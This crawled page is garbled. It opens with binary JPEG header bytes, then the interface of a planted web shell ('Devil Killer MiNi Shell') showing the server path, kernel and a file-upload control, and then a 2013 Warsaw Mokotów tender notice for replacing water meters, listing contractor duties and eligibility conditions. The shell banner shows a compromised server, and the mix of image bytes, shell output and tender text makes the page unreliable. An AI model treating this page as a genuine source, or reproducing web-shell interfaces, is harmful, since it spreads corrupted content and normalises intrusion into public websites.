JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130808/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130808/320458-N-2013.html

<p class="kh_header"><b>Warszawa: PRZETARG NIEOGRANICZONY ZAKOŃCZONY ZAWARCIEM UMOWY RAMOWEJ
na    
wymianę wodomierzy zimnej i ciepłej wody w lokalach znajdujących się w administracji Zakładu Gospodarowania Nieruchomościami w Dzielnicy Mokotów m. st. Warszawy na terenie DOM Konduktorska, Madalińskiego, Służewiec, Polkowska, Wierzbno, i Wiśniowa</b><br>
<b>Numer ogłoszenia: 320458 - 2013; data zamieszczenia: 08.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zawarcia umowy ramowej.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarowania Nieruchomościami w dzielnicy Mokotów m.st. Warszawy , ul. Irysowa 19, 02-660 Warszawa, woj. mazowieckie, tel. 022 5493727, 5493737, faks 022 5493737.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgnmokotow.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZETARG NIEOGRANICZONY ZAKOŃCZONY ZAWARCIEM UMOWY RAMOWEJ
na    
wymianę wodomierzy zimnej i ciepłej wody w lokalach znajdujących się w administracji Zakładu Gospodarowania Nieruchomościami w Dzielnicy Mokotów m. st. Warszawy na terenie DOM Konduktorska, Madalińskiego, Służewiec, Polkowska, Wierzbno, i Wiśniowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opis przedmiotu zamówienia oraz warunki jego realizacji i gwarancji.

1.1. Celem niniejszego postępowania jest podpisanie umowy ramowej ustalającej warunki dotyczące zamówień publicznych jakie mają zostać udzielone w okresie trwania ww umowy ramowej na wykonanie robót polegających na sukcesywnej wymianie wodomierzy zimnej i ciepłej wody w lokalach stanowiących  własność m.st. Warszawy,  gdzie istnieje konieczność wykonania wymiany.
       1.1.1. Zamawiający zawrze umowę ramową z maksymalnie trzema Wykonawcami, którzy złożą najkorzystniejsze oferty, ocenione w sposób opisany w pkt. 18 specyfikacji istotnych warunków zamówienia.

1.2. W ramach zamówienia Wykonawca zobowiązany będzie do wykonania robót zlecanych przez Zamawiającego wyszczególnionych w istotnych postanowieniach umowy oraz wg wymogów postawionych w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych stanowiącej Rozdział IV specyfikacji, oraz wg następujących warunków:
            1.2.1.Wymiana wodomierzy zimnej i ciepłej wody odbywać się będzie w oparciu o pisemne zlecenia z DOM  określające w szczególności: datę wystawienia, adresy lokali, termin rozpoczęcia i zakończenia robót, ilość wodomierzy zimnej i ciepłej wody do wymiany przy czym termin realizacji poszczególnych zleceń, o  których mowa wyżej  nie  przekroczy 21 dni   kalendarzowych licząc od daty wystawienia pisemnego zlecenia przez DOM.  
                     UWAGA: Zamawiający zobowiązuje się do wystawiania zleceń, o których mowa w zdaniu pierwszym, w terminie 7 dni licząc od dnia zawarcia umowy w sprawie zamówienia udzielonego na podstawie umowy ramowej. Termin wykonania zlecenia liczony będzie od daty jego wystawienia.
           1.2.2. Zamawiający może udzielić zamówienia uzupełniającego - patrz pkt. 6 
                      specyfikacji istotnych warunków zamówienia.
           1.2.3. Wykonawca musi sporządzić ofertę zgodnie z opisem pkt 16. Specyfikacji. 
           1.2.4.  Montowane wodomierze zimnej i ciepłej wody muszą  być dopuszczone do 
                      stosowania w obiektach  budownictwa mieszkaniowego i użyteczności publicznej 
                      i muszą być oznakowane znakiem budowlanym CE lub B, zgodnie z Ustawą o 
                      wyrobach budowlanych z dnia 16 kwietnia 2004 roku Dz.U.01.92.881 oraz muszą 
                      posiadać jeden z następujących dokumentów:
- krajowa deklaracja zgodności ww. wyrobów z Polską Normą lub aprobatą techniczną (dla wyrobów oznakowanych znakiem budowlanym B),
- deklaracja zgodności ww. wyrobów lub europejska aprobata techniczna (dla wyrobów oznakowanych znakiem CE)
1.2.5. Wykonawca musi posiadać aktualne dokumenty dotyczące wodomierzy o 
           których mowa w pkt. 8.1.7. specyfikacji istotnych warunków zamówienia. 
                1.2.6. Wykonane roboty oraz użyte materiały do wykonania przedmiotu zamówienia 
                          muszą spełniać wymogi art. 10   ustawy Prawo Budowlane z późn. zmianami w 
                          nawiązaniu z art. 5 ust. 1 lit. a, oraz ustawy z dnia 16 kwietnia 2004 r. o
                          wyrobach budowlanych (Dz. U. Nr 92 poz. 881) ponadto odpowiednio do
                          instrukcji montażu producenta  oraz specyfikacją techniczną wykonania i 
                          odbioru robót budowlanych stanowiącą Rozdział IV specyfikacji istotnych
                          warunków zamówienia.
            1.2.7. Wynagrodzenie ostateczne za wykonanie poszczególnych zleceń, o których 
                      mowa w pkt. 3.2.1.siwz, zostanie ustalone po wykonaniu robót i bezusterkowym  
                      odbiorze przez Zamawiającego i  rozliczone formularzem rozliczenia  
                      wykonanych robót zatwierdzonym przez Inspektora Nadzoru, wg poniższego 
                      wzoru:
            
               Formularz rozliczenia wykonanych robót 



Lp	ADRES, 
OPIS ROBÓT	Jm	ILOŚĆ	CENA JEDN.
zintegrowana	WARTOŚĆ	VAT(% i kwota)	Cena z VAT
							
							
							
							
							



      WYKONAWCA                                         INSPEKTOR NADZORU


1.2.8.Wykonawca w czasie realizacji przedmiotu zamówienia będzie utrzymywał ład i
           porządek na terenie, na którym wykonuje roboty oraz uporządkuje teren po 
           zakończeniu robót, a także zapewnieni warunki bezpieczeństwa i p. poż. 
           określone w przepisach szczególnych.
     1.2.9.  Wykonawca zorganizuje we własnym zakresie zaplecze techniczne w rozmiarach 
             koniecznych dla przeprowadzenia robót.
    1.2.10. Dostarczane wodomierze muszą być fabrycznie nowe, z ważną do 31 grudnia 
                  2018 r. cechą legalizacyjną, fabrycznie pakowane oraz posiadające następujące 
                  oznakowania: nazwę i adres producenta, identyfikację wyrobu zawierającą dane 
                  identyfikujące wodomierze, znak budowlany wyrobu zgodny z rozporządzeniem 
                  Ministra Infrastruktury z dnia 11 sierpnia 2004 roku w sprawie sposobów  
                  deklarowania zgodności  wyrobów  budowlanych (Dz. U. nr. 198 poz. 2041).
   1.2.11. Wykonawca zobowiązany jest do przeszkolenia lokatora w zakresie użytkowania 
                  wodomierzy i plomb. Lokator winien potwierdzić swoim podpisem na protokóle 
                  plombowania wodomierzy, że został przeszkolony przez pracownika firmy 
                  montującej wodomierze.
   1.2.12. Wykonawca przekaże do DOM  ww. protokół z podpisem lokatora. Ponadto 
                 Wykonawca przekaże do DOM dokumenty wyszczególnione w pkt. 3.2.17. 
                 specyfikacji.
   1.2.13. Wykonawca zobowiązany jest do wywiezienia zdemontowanych wodomierzy do 
                 punktu skupu złomu, posprzątania po wykonywanych robotach pomieszczeń przed   
                  przekazaniem Zamawiającemu;
   1.2.14. Z uwagi na to, że roboty prowadzone będą w lokalach zamieszkałych, wykonywanie 
                  robót musi odbywać się w sposób jak najmniej uciążliwy dla lokatorów, 
                  prowadzone roboty nie mogą  powodować przeszkód komunikacyjnych;
   1.2.15. Wykonawca nie może prowadzić robót w dni świąteczne. Roboty należy  prowadzić
                 w dni powszednie w godzinach od 800 do 1900;
   1.2.16. Wykonawca zobowiązany jest do zaopatrzenia pracowników wykonujących roboty 
                 w identyfikatory z widocznym zdjęciem pracownika, imieniem, nazwiskiem oraz 
                 nazwą  firmy;
   1.2.17. Przy odbiorze robót wymagana będzie od Wykonawcy dokumentacja w oparciu, o którą wykonano roboty, w tym: 
                      1. aktualne dokumenty określone w pkt 3.2.4 SIWZ
                      2. zlecenie na wykonanie robót,
                      3. formularz rozliczenia wykonanych robót,
                Odbiór dokonywany będzie w oparciu o aktualne normy, warunki techniczne
                 wykonania i  odbioru robót budowlanych oraz  Specyfikację Techniczną Wykonania 
                 i Odbioru Robót Budowlanych, która stanowi Rozdział IV SIWZ;
   1.2.18. Wykonawca zobowiązany jest do stosowania wymogów postawionych w  
                 Specyfikacji Technicznej i Odbioru Robót Budowlanych stanowiącej Rozdział IV
                 specyfikacji  istotnych warunków zamówienia 
   1.2.19. Wykonawca zobowiązany jest do dysponowania osobą  posiadającą odpowiednie 
           uprawnienia budowlane do kierowania robotami w specjalności instalacji    
           sanitarnych oraz posiadającą aktualne zaświadczenie o wpisie na listę właściwej 
           izby samorządu zawodowego.
   
1.3. Wymagania techniczne i technologiczne: 
zgodnie z opisem zawartym w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych, która stanowi Rozdział IV specyfikacji istotnych warunków zamówienia. 

      1.4.Wykonawca zobowiązany będzie do zastosowania podczas wykonywania zamówienia materiałów i urządzeń odpowiadających, co do jakości wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie (art.10 w związku z art. 5 ust. 1 lit a Ustawy z dnia 7 lipca 1994 r. Prawo budowlane (DZ. U. z 2003 r. Nr 207 poz. 2016 z późn. zm.) oraz ustawy z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. Nr 92 poz. 881). Na każde żądanie Zamawiającego Wykonawca zobowiązany będzie wystawić deklarację zgodności przed wbudowaniem wyrobu. 

1.5. Wymagania dotyczące gwarancji: 
         Zamawiający wymaga udzielenia gwarancji na wodomierze zimnej i ciepłej wody oraz wykonane roboty będące przedmiotem zamówienia, o których mowa w pkt. 3.1. specyfikacji istotnych warunków zamówienia oraz w § 1 Istotnych postanowień umowy (Rozdział III siwz) na czas 5 lat od daty bezusterkowego odbioru końcowego tych robót z tym, że dla materiałów wbudowanych okres ten nie może być krótszy niż gwarancja udzielona przez producenta, nie mniej jednak niż 5 lat.
 
   1.6. Warunki realizacji zamówienia:
            Warunki wykonania zamówienia zawarte są w :
           1.6.1.   Rozdziale III siwz: Istotnych postanowieniach umowy,
1.6.1.1. Zamawiający zastrzega sobie możliwość wprowadzenia zmian postanowień umowy zawartej w wyniku rozstrzygnięcia przedmiotowego postępowania o ile warunkiem wprowadzenia takich zmian będą między innymi okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te będą korzystne dla Zamawiającego oraz w przypadku zmiany porządku prawnego, a także w przypadku zmian zawartych w specyfikacji istotnych warunków zamówienia. Zmiany, o których mowa w zdaniu pierwszym  wymagają formy pisemnej pod rygorem nieważności.
1.6.1.2.Zamawiający dopuszcza możliwość zmiany umowy także w następujących przypadkach:
a) zmiany osób uczestniczących w realizacji umowy ramowej;
b) zmiany wymaganej sprawozdawczości i rozliczeń kosztów wykonania umów zawieranych na podstawie umowy ramowej;
c) zmiany regulacji prawnych wprowadzonych w życie po dacie zawarcia 
    umowy ramowej wraz ze skutkami takiej zmiany regulacji prawnych;
         1.6.2. Rozdziale IV siwz: Specyfikacji Technicznej Wykonania i Odbioru Robót 
                    Budowlanych.

1.7. Czynności, o których mowa w pkt. 3.1 i 3.2., niniejszej specyfikacji realizowane  na poszczególne zlecenia mają być wykonywane:
 1.7.1. zgodnie ze sposobem opisanym w specyfikacji technicznej wykonania i odbioru robót budowlanych, która stanowi Rozdział IV specyfikacji istotnych warunków zamówienia. 
1.7.2.warunkami wynikającymi z przepisów technicznych i czynnościami wymienionymi w art. 22 Ustawy z dnia 7.07.1994 r. prawo budowlane (Dz. U. 06.156.1118 z późn. zm.) i jego pochodnych,
 1.7.3. wymaganiami wynikającymi z aktualnych Norm i aprobat technicznych,
        1.7.4. zgodnie z zasadami rzetelnej wiedzy technicznej i sztuką budowlaną.
1.8. Realizacja zamówienia podlega prawu polskiemu, w tym w szczególności ustawie z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2006 r. Nr 156poz. 1118 z późn. zm.)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 38.42.11.00-3, 45.33.22.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W postępowaniu wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy w tym postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2010 r. Nr 113, poz. 759 ze zm.), a także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 ww ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi 
do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.	
         Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 4 do wzoru formularza oferty (pkt. 9.2.1. siwz) oraz w oparciu o potwierdzenie spełniania warunków w zakresie wskazanym poniżej:
2.Wykonawca musi wykazać, że posiada wiedzę i doświadczenie w zakresie realizacji robót stanowiących przedmiot zamówienia, tj. zrealizował w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 3 roboty budowlane w branży budowlanej sanitarnej polegające na wymianie wodomierzy zimnej i ciepłej wody w budynkach mieszkalnych lub użyteczności publicznej odpowiadające przedmiotowi zamówienia, o wartości nie mniejszej niż  60.000,- zł brutto każda. 
Spełnienie ww  warunku Zamawiający oceniał będzie na podstawie załączonego do oferty wykazu robót budowlanych, określonego w pkt 9.2.2 SIWZ, sporządzonego wg wzoru stanowiącego załącznik nr 5 do formularza oferty i załączonych dowodów, określonych w pkt. 9.2.67. SIWZ  potwierdzających, że wymienione w nim roboty zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane  zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
3.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie podmiotów, oddających do dyspozycji Wykonawcy niezbędne zasoby na okres korzystania z nich przy wykonaniu zamówienia, w formie oryginałów. 
Zamawiający wymaga, aby składane dokumenty:
-wskazywały okres jakiego dotyczy zobowiązanie,
-informację wskazującą, który konkretny zasób jest udostępniany. W przypadku udostępniania osób zdolnych do wykonania zamówienia należy imiennie wskazać osoby, które będą uczestniczyć w wykonaniu zamówienia. W przypadku udostępnienia wiedzy i doświadczenia należy wskazać konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.),
-charakteru stosunku , jaki będzie łączył wykonawcę z innym podmiotem.
Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający żąda wykazania za pomocą dokumentów wymaganych w pkt. 9. specyfikacji istotnych warunków zamówienia, iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 ustawy, o ile podmioty te będą brały udział w realizacji części zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki, o których mowa w art. 22 ust. 1 mogą być spełnione  łącznie.  
4.W przypadku gdy Wykonawca polegać będzie na doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu (w oryginale): 
4.1. pisemne zobowiązanie tych podmiotów do zrealizowania części zamówienia zawierające zakres robót, które te podmioty zobowiązują się wykonać - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na wiedzy i doświadczeniu innych podmiotów zakresie realizacji części zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełnienia warunku i za spełnienie tego warunku uzna złożenie oświadczenia, o którym mowa w pkt. 9.2.1.  siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2010 r. Nr 113, poz. 759 ze zm.), a także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 ww ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi 
do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.	
         Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 4 do wzoru formularza oferty (pkt. 9.2.1. siwz) oraz w oparciu o potwierdzenie spełniania warunków w zakresie wskazanym poniżej:

2.Wykonawca musi wykazać, że dysponuje osobą, która będzie odpowiadała za kierowanie  robotami  instalacyjnymi sanitarnymi oraz, że dysponuje co najmniej dwoma osobami do wykonania zamówienia, z doświadczeniem i kwalifikacjami w wykonywaniu robót instalacji sanitarnych
   Spełnianie ww. warunku oceniane będzie na podstawie przedłożonego w ofercie wykazu osób (wg wzoru stanowiącego załącznik nr 6 do formularza oferty). W ww wykazie należy podać informacje na temat kwalifikacji zawodowych tych osób, ich uprawnień, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia,  a także zakresu wykonywanych przez nich czynności i podstawie do dysponowania nimi.
3.Wykonawca musi wykazać, że dysponuje co najmniej jedną osobami, które zgodnie z wymogami art. 12 ustawy z 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243 poz. 1623 ze zm.) może, mogą pełnić samodzielną funkcję techniczną w budownictwie obejmującą kierowanie robotami budowlanymi w zakresie przedmiotu zamówienia, tj. posiadają uprawnienia budowlane do kierowania robotami budowlanymi w zakresie instalacji sanitarnych lub odpowiedni dokument stwierdzający przygotowanie zawodowe do kierowania budową i robotami w ww zakresie instalacji sanitarnych oraz wpisanych na listę członków właściwych izb samorządu zawodowego.
Spełnianie ww. warunku oceniane będzie na podstawie przedłożonego w ofercie oświadczenia wykonawcy  (wg wzoru stanowiącego załącznik nr 7 do formularza oferty), że osoba, osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia a także informacji dotyczącymi zakresu wykonywanych przez nich czynności i podstawie do dysponowania nimi.
4.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie podmiotów, oddających do dyspozycji Wykonawcy niezbędne zasoby na okres korzystania z nich przy wykonaniu zamówienia, w formie oryginałów. 
Zamawiający wymaga, aby składane dokumenty:
-wskazywały okres jakiego dotyczy zobowiązanie,
-informację wskazującą, który konkretny zasób jest udostępniany. W przypadku udostępniania osób zdolnych do wykonania zamówienia należy imiennie wskazać osoby, które będą uczestniczyć w wykonaniu zamówienia. W przypadku udostępnienia wiedzy i doświadczenia należy wskazać konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.),
-charakteru stosunku , jaki będzie łączył wykonawcę z innym podmiotem.
Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający żąda wykazania za pomocą dokumentów wymaganych w pkt. 9. specyfikacji istotnych warunków zamówienia, iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 ustawy, o ile podmioty te będą brały udział w realizacji części zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki, o których mowa w art. 22 ust. 1 mogą być spełnione  łącznie.  
5.W przypadku gdy Wykonawca polegać będzie na doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu (w oryginale): 
5.1.pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy osób, które będą uczestniczyć w realizacji zamówienia, zawierające także imienną listę tych osób - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na osobach zdolnych do wykonani zamówienia innych podmiotów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Wykonawca musi wykazać, że posiada opłaconą polisę, a w przypadku jej braku inny dokument  potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności  cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia potwierdzającą posiadanie ww ubezpieczenia OC przez Wykonawcę na kwotę co najmniej 100.000 PLN.
Zamawiający oceni jako spełniony warunek sytuacji ekonomicznej i finansowej na podstawie opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności  cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia potwierdzającej posiadanie ww ubezpieczenia OC przez Wykonawcę na kwotę co najmniej 100.000 PLN.</p>
</li></ul></li></ul>
